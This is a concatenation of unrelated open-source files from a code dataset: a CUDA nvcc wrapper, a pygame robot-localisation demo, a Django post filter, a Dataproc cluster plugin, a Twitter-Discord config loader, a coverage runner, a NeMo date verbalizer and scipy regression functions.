http://docs.nvidia.com/cuda/cuda-compiler-driver-nvcc/index.html#options-for-guiding-compiler-driver # Different actions are sharing NVCC_TEMP_DIR, so we cannot remove it if the directory already exists. if os.path.isfile(NVCC_TEMP_DIR): os.remove(NVCC_TEMP_DIR) if not os.path.exists(NVCC_TEMP_DIR): os.makedirs(NVCC_TEMP_DIR) nvccopts += ['--keep', '--keep-dir', NVCC_TEMP_DIR] cmd = [NVCC_PATH] + nvccopts if log: Log(cmd) proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, env=os.environ.copy(), shell=True) proc.wait() return proc.returncode def main(): parser = ArgumentParser() parser.add_argument('-x', nargs=1) parser.add_argument('--cuda_log', action='store_true') args, leftover = parser.parse_known_args(sys.argv[1:]) if args.x and args.x[0] == 'cuda': if args.cuda_log: Log('-x cuda') leftover = [pipes.quote(s) for s in leftover] if args.cuda_log: Log('using nvcc') return InvokeNvcc(leftover, log=args.cuda_log) # Strip our flags before passing through to the CPU compiler for files which # are not -x cuda. We can't just pass 'leftover' because it also strips -x. # We not only want to pass -x to the CPU compiler, but also keep it in its # relative location in the argv list (the compiler is actually sensitive to # this). cpu_compiler_flags = [flag for flag in sys.argv[1:] if not flag.startswith(('--cuda_log')) and not flag.startswith(('-nvcc_options'))] return subprocess.call([CPU_COMPILER] + cpu_compiler_flags) if __name__ == '__main__': sys.exit(main())
the-stack_106_24408
#! /usr/bin/env python import pygame import sys import random class Robot(object): def __init__ (self): self.pygame = pygame.init() self.screen = pygame.display.set_mode((640,480)) self.x = random.randint(0,9) # robot x position self.y = random.randint(0,9) # robot y position self.z = 0.0 self.zred = 0.0 self.zblue = 0.0 def robot_up(self): """ We call this methode when robot move up """ self.y = self.y - 1 if self.y < 0: self.y = 0 def robot_down(self): """ We call this methode when robot move down """ self.y = self.y + 1 if self.y > 9: self.y = 9 def robot_left(self): """ We call this methode when robot move left """ self.x = self.x - 1 if self.x < 0: self.x = 0 def robot_right(self): """ We call this methode when robot move right """ self.x = self.x + 1 if self.x > 9: self.x = 9 def robot_random_move(self): """ Robot random move """ r = random.randint(1,4) if r == 1 and self.x < 9: self.robot_right() return 1 elif r == 2 and self.x > 0: self.robot_left() return 2 elif r == 3 and self.y > 0: self.robot_up() return 3 elif r == 4 and self.y < 9: self.robot_down() return 4 else: return 5 def display_robot(self): """ Display robot on screen """ self.screen.fill((0,0,0)) blue = (0,0,255) red = (255,0,0) pygame.draw.rect(self.screen,blue,(0,0,640,48)) pygame.draw.rect(self.screen,blue,(0,0,64,480)) pygame.draw.rect(self.screen,red,(640-64,0,64,480)) pygame.draw.rect(self.screen,red,(0,480-48,640,48)) pygame.draw.circle(self.screen,(255,255,255),(self.x*64+32,self.y*48+24),24) pygame.display.update() pygame.time.wait(50) def perception(self): """ Perception whenb robot hit the wall or encounter an obstacle """ self.z = 0.0 self.zred = 0.0 self.zblue = 0.0 if (self.x == 0 or self.y == 0) and random.random() < 0.3: self.zblue = 1.0 if (self.x == 9 or self.y == 9) and random.random() < 0.3: self.zred = 1.0 if (self.x == 0 or self.y == 0 or self.x == 9 or self.y == 9) and random.random() < 0.3: self.z = 1.0 def display_probability_map(self,p): """ Display robot probability map for localisation """ self.screen.fill((0,0,0)) for j in range(0,10): for i in range(0,10): pygame.draw.rect(self.screen,(50+205*p[i][j],0,50+205*p[i][j]),(i*64,j*48,64,48)) pygame.draw.circle(self.screen,(255,255,255),(self.y*64+32,self.x*48+24),24) pygame.display.update() pygame.time.wait(50) def init_probability_map(self): """ Initialisation of probability map by 0.10 for each cell of the table""" #0.10 should be 0.1 . Each line probalility should be equal to 1 (0.1 * 10 = 1) #with 0.10 we can see the color difference between the screen and probabily map in display_probability_ma i = 10 j = 10 return [[0.10 for x in range(j)] for y in range(j)] ################## LOCALISATION #################### def move_right(self, p): """ When robot move rigth, the probability that it is on left is zero (0) we move probability of each cell like p[9][9]= p[9][8], p[8][9]= p[8][8] and put zero on the left column of probability table """ i = 9 j = 9 while i > 0: while j > -1: p[j][i] = p[j][i-1] j = j - 1 j = 9 i = i - 1 for i in range(10): p[i][0] = 0 # Put zero on the left column of probability table def move_left(self, p): """ When robot move left, the probability that it is on right is zero (0) we move probability of each cell like p[0][0]= p[0][1], p[1][0]= p[1][1] and put zero on the right column of probability table """ i = 0 j = 0 while i < 9: while j < 10: p[j][i] = p[j][i+1] j = j + 1 j = 0 i = i + 1 for i in range(10): p[i][9] = 0 # Put zero on the left column of probability table def move_up(self, p): """ When robot move up, the probability that it is on down is zero (0) we move probability of each cell like p[0][0]= p[1][0], p[0][1]= p[1][1] and put zero on the down column of probability table """ i = 0 j = 0 while i < 9: while j < 10: p[i][j] = p[i+1][j] j = j + 1 j = 0 i = i + 1 for i in range(10): p[9][i] = 0 # Put zero on the down column of probability table def move_down(self, p): """ When robot move down, the probability that it is on up is zero (0) we move probability of each cell like p[9][9]= p[8][9], p[9][8]= p[8][9] and put zero on the up column of probability table """ i = 9 j = 9 while i > 0: while j > -1: p[i][j] = p[i-1][j] j = j - 1 j = 9 i = i - 1 for i in range(10): p[0][i] = 0 # Put zero on the up column of probability table def localisation(self,m, p): """ Localisation """ if m == 1 : self.move_right(p) elif m == 2 : self.move_left(p) elif m == 3 : self.move_up(p) elif m == 4: self.move_down(p) def display_prob(self, p): """ Display probability map """ for i in range(10): for j in range(10): print(p[i][j], end=' ') print('\n') def main (): """Main function""" rt = Robot() p = rt.init_probability_map() while True: #rt.display_robot() rt.display_probability_map(p) m = rt.robot_random_move() rt.perception() rt.localisation(m,p) #print("x : " +str(rt.x)) #print("y : " +str(rt.y)) #rt.display_prob(p) #print(m) #print("Perception: I receive: "+str(rt.z)) if __name__ == "__main__": main()
the-stack_106_24409
from data.models import Comment, Post, User from django.db.models import Q from .. import remote_request class PostListMixin(object): def preprocess(self, request, *args, **kwargs): posts = Post.objects.none() user = None if 'post_list_filter' in kwargs: if request.user.is_authenticated(): user = User.objects.get(email=request.user) posts = self.get_filtered_list(kwargs['post_list_filter'], user) if isinstance(posts, Post): setattr(posts, 'comments', Comment.objects.filter(post=posts).all()) else: for index, post in enumerate(posts): setattr(posts[index], 'comments', Comment.objects.filter(post=post).all()) self.context['post_list'] = posts super(PostListMixin, self).preprocess(request, *args, **kwargs) def get_filtered_list(self, filter, user): filtered_list = Post.objects.all() if 'visible' in filter: # /author/posts filtered_list = self.get_posts_visible_to_current_user(user) elif 'public' in filter: # /posts filtered_list = self.get_all_public_posts() elif 'visible_by_author' in filter: # /author/<author_id>/posts author = User.objects.get(guid=filter['visible_by_author']) filtered_list = self.get_posts_by_author(author, user) elif 'post_id' in filter: # /posts/<post_id> try: filtered_list = Post.objects.get(guid=filter['post_id']) except: filtered_list = Post.objects.none() return filtered_list def get_posts_visible_to_current_user(self, user): # add all posts by current user vis_posts = [p for p in Post.objects.filter(author=user)] # add all public posts vis_posts.extend([p for p in self.get_all_public_posts() if p not in vis_posts]) # add all posts by friends, visible to friends friend_list = self.context['friend_list'] for f in friend_list: vis_posts.extend([p for p in Post.objects.filter( Q(author=f) & Q(visibility='FRIENDS')) if p not in vis_posts]) # get FOAF posts foaf_list = self.context['foaf_list'] for f in foaf_list: vis_posts.extend([p for p in Post.objects.filter( Q(author=f) & Q(visibility='FOAF')) if p not in vis_posts]) return vis_posts def get_all_public_posts(self): posts = Post.objects.filter(visibility='PUBLIC') remote_posts = remote_request.getRemoteObject(None, "posts") post_list = list(posts) if remote_posts: for post in remote_posts: post_list.append(post) return posts def get_posts_by_author(self, author, user): posts = self.get_posts_visible_to_current_user(user) posts = [p for p in posts if p.author == author] return posts
the-stack_106_24410
import dku_dataproc from gce_client import DataProcClient import os, json, argparse, logging from dataiku.cluster import Cluster logging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=logging.INFO) logging.getLogger().setLevel(logging.INFO) class MyCluster(Cluster): def __init__(self,cluster_id, cluster_name,config, plugin_config): self.cluster_name = cluster_name self.config = config self.plugin_config = plugin_config self.client = None self.cluster_id = config.get("gcloudClusterId") or cluster_id return def __init_client__(self): logging.info("loading dataproc client") if not self.client: self.client = DataProcClient(self.config.get("gcloudProjectId") ,asumeDefaultCredentials=self.config.get("gcloudUseDefaultSvcAccount") ,service_account_details=self.config.get("gcloudGoogleServiceAccountKey") ) self.client.region = self.config.get("gcloudRegionId") self.client.zone = self.config.get("gcloudZoneId") return def start(self): logging.info("starting cluster") self.__init_client__() full_name = "DSS cluster name=%s" % (self.cluster_name) name = self.cluster_id logging.info("starting cluster, name=%s" % (full_name)) clusterBody = self.client.dump(name) self.client.dump(name) # handling subnets and IP configuration if self.config.get("gcloudUseCustomGceConfig"): clusterBody["config"]["gceClusterConfig"] = self.config.get("gcloudCustomGceConfig") else: if self.config.get("gcloudUseCustomSubnet"): clusterBody["config"]["gceClusterConfig"] = { 'zoneUri': self.config.get("gcloudZoneId"), "subnetworkUri": self.config.get("gcloudCustomSubnetId"), "internalIpOnly": self.config.get("gcloudUseInternalIP") } else: clusterBody["config"]["gceClusterConfig"]["internalIpOnly"] = self.config.get("gcloudUseInternalIP") # set network tags to cluster tagsAsString = self.config.get("gcloudNetworkTags") if tagsAsString: clusterBody["config"]["gceClusterConfig"]["tags"] = tagsAsString.split(",") clusterBody = self.client.dump(name) self.client.dump(name) clusterBody["config"]["masterConfig"]['machineTypeUri'] = self.config.get("masterInstanceType") clusterBody["config"]["workerConfig"]['machineTypeUri'] = self.config.get("slaveInstanceType") clusterBody["config"]["workerConfig"]['numInstances'] = int(self.config["instancesCount"]) if self.config.get("dataprocVersion") != "LATEST": clusterBody["config"]["softwareConfig"]['imageVersion'] = self.config.get("dataprocVersion") props = {} if self.config["metastoreDBMode"] == "CUSTOM_JDBC": props = { "javax.jdo.option.ConnectionURL" : self.config["metastoreJDBCURL"], "javax.jdo.option.ConnectionDriverName": self.config["metastoreJDBCDriver"], "javax.jdo.option.ConnectionUserName": self.config["metastoreJDBCUser"], "javax.jdo.option.ConnectionPassword": self.config["metastoreJDBCPassword"], } logging.imfo(" setting hive metastore for custom JDBC") self.client.setHiveConfToClusterDef(clusterBody,props) elif self.config["metastoreDBMode"] == "MYSQL": props = { "javax.jdo.option.ConnectionURL" : "jdbc:mysql://%s:3306/hive?createDatabaseIfNotExist=true" % self.config["metastoreMySQLHost"], "javax.jdo.option.ConnectionDriverName": "org.mariadb.jdbc.Driver", "javax.jdo.option.ConnectionUserName": self.config["metastoreMySQLUser"], "javax.jdo.option.ConnectionPassword": self.config["metastoreMySQLPassword"] } logging.imfo(" setting hive metastore for MySQL") self.client.setHiveConfToClusterDef(clusterBody,props) elif self.config["metastoreDBMode"] == "GCLOUD_SQL": self.client.setHiveMetastoreToGoogleSql(clusterBody,instanceName,projectId=None,region=None,extraProps={}) # Building Dataproc cluster self.client.run(name,clusterBody) logging.info("waiting for cluster to start") self.client.waitForStatus(name) return dku_dataproc.make_cluster_keys_and_data(self.client, self.cluster_id,clusterBody=clusterBody, create_user_dir=True, create_databases=self.config.get("databasesToCreate")) def stop(self, data): """ Stop the cluster :param data: the dict of data that the start() method produced for the cluster """ logging.info("Deleting cluster {}".format(self.cluster_id)) self.__init_client__() self.client.terminate(data["dataprocClusterId"]) return
the-stack_106_24413
#!/usr/bin/env python import os import sys import pathlib import subprocess import shutil import itertools def main(): exit_status = 0 assert pathlib.Path.cwd().resolve() == pathlib.Path(__file__).parent.resolve(), \ f"Please run {__file__} from ALIGN_HOME." argv = sys.argv[1:] output_dir = pathlib.Path('coverage-reports').resolve() c_coverage_file = pathlib.Path('coverage.info').resolve() try: from tests._cmake import CMAKE_BINARY_DIR, CMAKE_SOURCE_DIR except: CMAKE_BINARY_DIR=None CMAKE_SOURCE_DIR=None # Detect whether to run LCOV GCOV_ENABLED = False if shutil.which('lcov') is None: print("WARNING: `lcov` not found. Generating coverage for python components only.") elif not CMAKE_BINARY_DIR or not CMAKE_SOURCE_DIR: print("WARNING: CPP Source / Binary information not found. Generating coverage for python components only.") print(" Run `pip install -e .[test] --no-build-isolation --install-option='-DCODE_COVERAGE=ON'` to instrument cpp code.") elif next(pathlib.Path(CMAKE_BINARY_DIR).glob('**/*.gcno'), None) is None: print("WARNING: Could not find any .gcno files. Generating coverage for python components only.") print(" Run `pip install -e .[test] --no-build-isolation --install-option='-DCODE_COVERAGE=ON'` to instrument cpp code.") else: print("INFO: Code coverage for cpp extension has been enabled. Please see coverage-reports/cpp.") GCOV_ENABLED = True # Clean existing report (if any) if output_dir.is_dir(): shutil.rmtree(str(output_dir)) # Number of parallel jobs if 'MAX_JOBS' in os.environ: MAX_JOBS = os.environ['MAX_JOBS'] else: MAX_JOBS = 'auto' # LCOV init if GCOV_ENABLED: ret = subprocess.run(' '.join([ 'lcov', '--directory', CMAKE_BINARY_DIR, '--zerocounters']), shell=True) if not exit_status: exit_status = ret.returncode # Actual command is run here ret = subprocess.run(' '.join([ 'pytest', '-vv', # Call pytest in verbose mode '-n', MAX_JOBS, # pytest-xdist options '--cov-report', f'html:{output_dir}/python', '--cov=align', # pytest-cov options *argv ]), shell=True) if not exit_status: exit_status = ret.returncode if GCOV_ENABLED: # Finish capture ret = subprocess.run(' '.join([ 'lcov', '--capture', '--no-external', '--directory', '.', '--output-file', f'{c_coverage_file}']), shell=True) if not exit_status: exit_status = ret.returncode # Remove coverage we aren't interested in ret = subprocess.run(' '.join([ 'lcov', '--remove', f'{c_coverage_file}', '--output-file', f'{c_coverage_file}', '*/_deps/*']), shell=True) if not exit_status: exit_status = ret.returncode # Generate report ret = subprocess.run(' '.join([ 'genhtml', f'{c_coverage_file}', '--output-directory', f'{output_dir}/cpp', '--no-branch-coverage', '--title', '"CPP lcov report"']), shell=True) if not exit_status: exit_status = ret.returncode return exit_status if __name__ == '__main__': sys.exit(main())
the-stack_106_24414
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. # Copyright 2015 and onwards Google, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from nemo_text_processing.text_normalization.en.graph_utils import ( NEMO_NOT_QUOTE, GraphFst, delete_extra_space, delete_space, ) try: import pynini from pynini.lib import pynutil PYNINI_AVAILABLE = True except (ModuleNotFoundError, ImportError): PYNINI_AVAILABLE = False class DateFst(GraphFst): """ Finite state transducer for verbalizing date, e.g. date { month: "february" day: "five" year: "twenty twelve" preserve_order: true } -> february fifth twenty twelve date { day: "five" month: "february" year: "twenty twelve" preserve_order: true } -> the fifth of february twenty twelve Args: ordinal: OrdinalFst deterministic: if True will provide a single transduction option, for False multiple transduction are generated (used for audio-based normalization) """ def __init__(self, ordinal: GraphFst, deterministic: bool = True): super().__init__(name="date", kind="verbalize", deterministic=deterministic) month = pynini.closure(NEMO_NOT_QUOTE, 1) day_cardinal = ( pynutil.delete("day:") + delete_space + pynutil.delete("\"") + pynini.closure(NEMO_NOT_QUOTE, 1) + pynutil.delete("\"") ) day = day_cardinal @ ordinal.suffix if not deterministic: day |= day_cardinal month = pynutil.delete("month:") + delete_space + pynutil.delete("\"") + month + pynutil.delete("\"") year = ( pynutil.delete("year:") + delete_space + pynutil.delete("\"") + pynini.closure(NEMO_NOT_QUOTE, 1) + delete_space + pynutil.delete("\"") ) # month (day) year graph_mdy = ( month + pynini.closure(delete_extra_space + day, 0, 1) + pynini.closure(delete_extra_space + year, 0, 1) ) # day month year graph_dmy = ( pynutil.insert("the ") + day + delete_extra_space + pynutil.insert("of ") + month + pynini.closure(delete_extra_space + year, 0, 1) ) optional_preserve_order = pynini.closure( pynutil.delete("preserve_order:") + delete_space + pynutil.delete("true") + delete_space | pynutil.delete("field_order:") + delete_space + pynutil.delete("\"") + NEMO_NOT_QUOTE + pynutil.delete("\"") + delete_space ) final_graph = ( (graph_mdy | year | pynutil.add_weight(graph_dmy, 0.001)) + delete_space + optional_preserve_order ) delete_tokens = self.delete_tokens(final_graph) self.fst = delete_tokens.optimize()
the-stack_106_24417
from dataIO import fileIO import os false_strings = ["false", "False", "f", "F", "0", ""] if fileIO("data.json", "check"): data_json = fileIO("data.json", "load") else: data_json = { "Twitter": { "consumer_key": os.environ["CONSUMER_KEY"], "consumer_secret": os.environ["CONSUMER_SECRET"], "access_token": os.environ["ACCESS_TOKEN"], "access_token_secret": os.environ["ACCESS_TOKEN_SECRET"] }, "Discord": [ { "IncludeReplyToUser": False, "IncludeRetweet": False, "IncludeUserReply": False, "webhook_urls": os.environ.get("WEBHOOK_URL", []).replace(" ", "").split(","), "twitter_ids": os.environ.get("TWITTER_ID", []).replace(" ", "").split(",") } ], "twitter_ids": [] }
the-stack_106_24418
import numpy as np import scipy.stats._stats_py from . import distributions from .._lib._bunch import _make_tuple_bunch __all__ = ['_find_repeats', 'linregress', 'theilslopes', 'siegelslopes'] # This is not a namedtuple for backwards compatibility. See PR #12983 LinregressResult = _make_tuple_bunch('LinregressResult', ['slope', 'intercept', 'rvalue', 'pvalue', 'stderr'], extra_field_names=['intercept_stderr']) def linregress(x, y=None, alternative='two-sided'): """ Calculate a linear least-squares regression for two sets of measurements. Parameters ---------- x, y : array_like Two sets of measurements. Both arrays should have the same length. If only `x` is given (and ``y=None``), then it must be a two-dimensional array where one dimension has length 2. The two sets of measurements are then found by splitting the array along the length-2 dimension. In the case where ``y=None`` and `x` is a 2x2 array, ``linregress(x)`` is equivalent to ``linregress(x[0], x[1])``. alternative : {'two-sided', 'less', 'greater'}, optional Defines the alternative hypothesis. Default is 'two-sided'. The following options are available: * 'two-sided': the slope of the regression line is nonzero * 'less': the slope of the regression line is less than zero * 'greater': the slope of the regression line is greater than zero .. versionadded:: 1.7.0 Returns ------- result : ``LinregressResult`` instance The return value is an object with the following attributes: slope : float Slope of the regression line. intercept : float Intercept of the regression line. rvalue : float The Pearson correlation coefficient. The square of ``rvalue`` is equal to the coefficient of determination. pvalue : float The p-value for a hypothesis test whose null hypothesis is that the slope is zero, using Wald Test with t-distribution of the test statistic. See `alternative` above for alternative hypotheses. stderr : float Standard error of the estimated slope (gradient), under the assumption of residual normality. intercept_stderr : float Standard error of the estimated intercept, under the assumption of residual normality. See Also -------- scipy.optimize.curve_fit : Use non-linear least squares to fit a function to data. scipy.optimize.leastsq : Minimize the sum of squares of a set of equations. Notes ----- Missing values are considered pair-wise: if a value is missing in `x`, the corresponding value in `y` is masked. For compatibility with older versions of SciPy, the return value acts like a ``namedtuple`` of length 5, with fields ``slope``, ``intercept``, ``rvalue``, ``pvalue`` and ``stderr``, so one can continue to write:: slope, intercept, r, p, se = linregress(x, y) With that style, however, the standard error of the intercept is not available. To have access to all the computed values, including the standard error of the intercept, use the return value as an object with attributes, e.g.:: result = linregress(x, y) print(result.intercept, result.intercept_stderr) Examples -------- >>> import matplotlib.pyplot as plt >>> from scipy import stats >>> rng = np.random.default_rng() Generate some data: >>> x = rng.random(10) >>> y = 1.6*x + rng.random(10) Perform the linear regression: >>> res = stats.linregress(x, y) Coefficient of determination (R-squared): >>> print(f"R-squared: {res.rvalue**2:.6f}") R-squared: 0.717533 Plot the data along with the fitted line: >>> plt.plot(x, y, 'o', label='original data') >>> plt.plot(x, res.intercept + res.slope*x, 'r', label='fitted line') >>> plt.legend() >>> plt.show() Calculate 95% confidence interval on slope and intercept: >>> # Two-sided inverse Students t-distribution >>> # p - probability, df - degrees of freedom >>> from scipy.stats import t >>> tinv = lambda p, df: abs(t.ppf(p/2, df)) >>> ts = tinv(0.05, len(x)-2) >>> print(f"slope (95%): {res.slope:.6f} +/- {ts*res.stderr:.6f}") slope (95%): 1.453392 +/- 0.743465 >>> print(f"intercept (95%): {res.intercept:.6f}" ... f" +/- {ts*res.intercept_stderr:.6f}") intercept (95%): 0.616950 +/- 0.544475 """ TINY = 1.0e-20 if y is None: # x is a (2, N) or (N, 2) shaped array_like x = np.asarray(x) if x.shape[0] == 2: x, y = x elif x.shape[1] == 2: x, y = x.T else: raise ValueError("If only `x` is given as input, it has to " "be of shape (2, N) or (N, 2); provided shape " f"was {x.shape}.") else: x = np.asarray(x) y = np.asarray(y) if x.size == 0 or y.size == 0: raise ValueError("Inputs must not be empty.") if np.amax(x) == np.amin(x) and len(x) > 1: raise ValueError("Cannot calculate a linear regression " "if all x values are identical") n = len(x) xmean = np.mean(x, None) ymean = np.mean(y, None) # Average sums of square differences from the mean # ssxm = mean( (x-mean(x))^2 ) # ssxym = mean( (x-mean(x)) * (y-mean(y)) ) ssxm, ssxym, _, ssym = np.cov(x, y, bias=1).flat # R-value # r = ssxym / sqrt( ssxm * ssym ) if ssxm == 0.0 or ssym == 0.0: # If the denominator was going to be 0 r = 0.0 else: r = ssxym / np.sqrt(ssxm * ssym) # Test for numerical error propagation (make sure -1 < r < 1) if r > 1.0: r = 1.0 elif r < -1.0: r = -1.0 slope = ssxym / ssxm intercept = ymean - slope*xmean if n == 2: # handle case when only two points are passed in if y[0] == y[1]: prob = 1.0 else: prob = 0.0 slope_stderr = 0.0 intercept_stderr = 0.0 else: df = n - 2 # Number of degrees of freedom # n-2 degrees of freedom because 2 has been used up # to estimate the mean and standard deviation t = r * np.sqrt(df / ((1.0 - r + TINY)*(1.0 + r + TINY))) t, prob = scipy.stats._stats_py._ttest_finish(df, t, alternative) slope_stderr = np.sqrt((1 - r**2) * ssym / ssxm / df) # Also calculate the standard error of the intercept # The following relationship is used: # ssxm = mean( (x-mean(x))^2 ) # = ssx - sx*sx # = mean( x^2 ) - mean(x)^2 intercept_stderr = slope_stderr * np.sqrt(ssxm + xmean**2) return LinregressResult(slope=slope, intercept=intercept, rvalue=r, pvalue=prob, stderr=slope_stderr, intercept_stderr=intercept_stderr) def theilslopes(y, x=None, alpha=0.95, method='separate'): r""" Computes the Theil-Sen estimator for a set of points (x, y). `theilslopes` implements a method for robust linear regression. It computes the slope as the median of all slopes between paired values. Parameters ---------- y : array_like Dependent variable. x : array_like or None, optional Independent variable. If None, use ``arange(len(y))`` instead. alpha : float, optional Confidence degree between 0 and 1. Default is 95% confidence. Note that `alpha` is symmetric around 0.5, i.e. both 0.1 and 0.9 are interpreted as "find the 90% confidence interval". method : {'joint', 'separate'}, optional Method to be used for computing estimate for intercept. Following methods are supported, * 'joint': Uses np.median(y - medslope * x) as intercept. * 'separate': Uses np.median(y) - medslope * np.median(x) as intercept. The default is 'separate'. .. versionadded:: 1.8.0 Returns ------- medslope : float Theil slope. medintercept : float Intercept of the Theil line. lo_slope : float Lower bound of the confidence interval on `medslope`. up_slope : float Upper bound of the confidence interval on `medslope`. See Also -------- siegelslopes : a similar technique using repeated medians Notes ----- The implementation of `theilslopes` follows [1]_. The intercept is not defined in [1]_, and here it is defined as ``median(y) - medslope*median(x)``, which is given in [3]_. Other definitions of the intercept exist in the literature such as ``median(y - medslope*x)`` in [4]_. The approach to compute the intercept can be determined by the parameter ``method``. A confidence interval for the intercept is not given as this question is not addressed in [1]_. References ---------- .. [1] P.K. Sen, "Estimates of the regression coefficient based on Kendall's tau", J. Am. Stat. Assoc., Vol. 63, pp. 1379-1389, 1968. .. [2] H. Theil, "A rank-invariant method of linear and polynomial regression analysis I, II and III", Nederl. Akad. Wetensch., Proc. 53:, pp. 386-392, pp. 521-525, pp. 1397-1412, 1950. .. [3] W.L. Conover, "Practical nonparametric statistics", 2nd ed., John Wiley and Sons, New York, pp. 493. .. [4] https://en.wikipedia.org/wiki/Theil%E2%80%93Sen_estimator Examples -------- >>> from scipy import stats >>> import matplotlib.pyplot as plt >>> x = np.linspace(-5, 5, num=150) >>> y = x + np.random.normal(size=x.size) >>> y[11:15] += 10 # add outliers >>> y[-5:] -= 7 Compute the slope, intercept and 90% confidence interval. For comparison, also compute the least-squares fit with `linregress`: >>> res = stats.theilslopes(y, x, 0.90, method='separate') >>> lsq_res = stats.linregress(x, y) Plot the results. The Theil-Sen regression line is shown in red, with the dashed red lines illustrating the confidence interval of the slope (note that the dashed red lines are not the confidence interval of the regression as the confidence interval of the intercept is not included). The green line shows the least-squares fit for comparison. >>> fig = plt.figure() >>> ax = fig.add_subplot(111) >>> ax.plot(x, y, 'b.') >>> ax.plot(x, res[1] + res[0] * x, 'r-') >>> ax.plot(x, res[1] + res[2] * x, 'r--') >>> ax.plot(x, res[1] + res[3] * x, 'r--') >>> ax.plot(x, lsq_res[1] + lsq_res[0] * x, 'g-') >>> plt.show() """ if method not in ['joint', 'separate']: raise ValueError(("method must be either 'joint' or 'separate'." "'{}' is invalid.".format(method))) # We copy both x and y so we can use _find_repeats. y = np.array(y).flatten() if x is None: x = np.arange(len(y), dtype=float) else: x = np.array(x, dtype=float).flatten() if len(x) != len(y): raise ValueError("Incompatible lengths ! (%s<>%s)" % (len(y), len(x))) # Compute sorted slopes only when deltax > 0 deltax = x[:, np.newaxis] - x deltay = y[:, np.newaxis] - y slopes = deltay[deltax > 0] / deltax[deltax > 0] slopes.sort() medslope = np.median(slopes) if method == 'joint': medinter = np.median(y - medslope * x) else: medinter = np.median(y) - medslope * np.median(x) # Now compute confidence intervals if alpha > 0.5: alpha = 1. - alpha z = distributions.norm.ppf(alpha / 2.) # This implements (2.6) from Sen (1968) _, nxreps = _find_repeats(x) _, nyreps = _find_repeats(y) nt = len(slopes) # N in Sen (1968) ny = len(y) # n in Sen (1968) # Equation 2.6 in Sen (1968): sigsq = 1/18. * (ny * (ny-1) * (2*ny+5) - sum(k * (k-1) * (2*k + 5) for k in nxreps) - sum(k * (k-1) * (2*k + 5) for k in nyreps)) # Find the confidence interval indices in `slopes` sigma = np.sqrt(sigsq) Ru = min(int(np.round((nt - z*sigma)/2.)), len(slopes)-1) Rl = max(int(np.round((nt + z*sigma)/2.)) - 1, 0) delta = slopes[[Rl, Ru]] return medslope, medinter, delta[0], delta[1] def _find_repeats(arr): # This function assumes it may clobber its input. if len(arr) == 0: return np.array(0, np.float64), np.array(0, np.intp) # XXX This cast was previously needed for the Fortran implementation, # should we ditch it? arr = np.asarray(arr, np.float64).ravel() arr.sort() # Taken from NumPy 1.9's np.unique. change = np.concatenate(([True], arr[1:] != arr[:-1])) unique = arr[change] change_idx = np.concatenate(np.nonzero(change) + ([arr.size],)) freq = np.diff(change_idx) atleast2 = freq > 1 return unique[atleast2], freq[atleast2] def siegelslopes(y, x=None, method="hierarchical"): r""" Computes the Siegel estimator for a set of points (x, y). `siegelslopes` implements a method for robust linear regression using repeated medians (see [1]_) to fit a line to the points (x, y). The method is robust to outliers with an asymptotic breakdown point of 50%. Parameters ---------- y : array_like Dependent variable. x : array_like or None, optional Independent variable. If None, use ``arange(len(y))`` instead. method : {'hierarchical', 'separate'} If 'hierarchical', estimate the intercept using the estimated slope ``medslope`` (default option). If 'separate', estimate the intercept independent of the estimated slope. See Notes for details. Returns ------- medslope : float Estimate of the slope of the regression line. medintercept : float Estimate of the intercept of the regression line. See Also -------- theilslopes : a similar technique without repeated medians Notes ----- With ``n = len(y)``, compute ``m_j`` as the median of the slopes from the point ``(x[j], y[j])`` to all other `n-1` points. ``medslope`` is then the median of all slopes ``m_j``. Two ways are given to estimate the intercept in [1]_ which can be chosen via the parameter ``method``. The hierarchical approach uses the estimated slope ``medslope`` and computes ``medintercept`` as the median of ``y - medslope*x``. The other approach estimates the intercept separately as follows: for each point ``(x[j], y[j])``, compute the intercepts of all the `n-1` lines through the remaining points and take the median ``i_j``. ``medintercept`` is the median of the ``i_j``. The implementation computes `n` times the median of a vector of size `n` which can be slow for large vectors. There are more efficient algorithms (see [2]_) which are not implemented here. References ---------- .. [1] A. Siegel, "Robust Regression Using Repeated Medians", Biometrika, Vol. 69, pp. 242-244, 1982. .. [2] A. Stein and M. Werman, "Finding the repeated median regression line", Proceedings of the Third Annual ACM-SIAM Symposium on Discrete Algorithms, pp. 409-413, 1992. Examples -------- >>> from scipy import stats >>> import matplotlib.pyplot as plt >>> x = np.linspace(-5, 5, num=150) >>> y = x + np.random.normal(size=x.size) >>> y[11:15] += 10 # add outliers >>> y[-5:] -= 7 Compute the slope and intercept. For comparison, also compute the least-squares fit with `linregress`: >>> res = stats.siegelslopes(y, x) >>> lsq_res = stats.linregress(x, y) Plot the results. The Siegel regression line is shown in red. The green line shows the least-squares fit for comparison. >>> fig = plt.figure() >>> ax = fig.add_subplot(111) >>> ax.plot(x, y, 'b.') >>> ax.plot(x, res[1] + res[0] * x, 'r-') >>> ax.plot(x, lsq_res[1] + lsq_res[0] * x, 'g-') >>> plt.show() """ if method not in ['hierarchical', 'separate']: raise ValueError("method can only be 'hierarchical' or 'separate'") y = np.asarray(y).ravel() if x is None: x = np.arange(len(y), dtype=float) else: x = np.asarray(x, dtype=float).ravel() if len(x) != len(y): raise ValueError("Incompatible lengths ! (%s<>%s)" % (len(y), len(x))) deltax = x[:, np.newaxis] - x deltay = y[:, np.newaxis] - y slopes, intercepts = [], [] for j in range(len(x)): id_nonzero = deltax[j, :] != 0 slopes_j = deltay[j, id_nonzero] / deltax[j, id_nonzero] medslope_j = np.median(slopes_j) slopes.append(medslope_j) if method == 'separate': z = y*x[j] - y[j]*x medintercept_j = np.median(z[id_nonzero] / deltax[j, id_nonzero]) intercepts.append(medintercept_j) medslope = np.median(np.asarray(slopes)) if method == "separate": medinter = np.median(np.asarray(intercepts)) else: medinter = np.median(y - medslope*x) return medslope, medinter
the-stack_106_24420
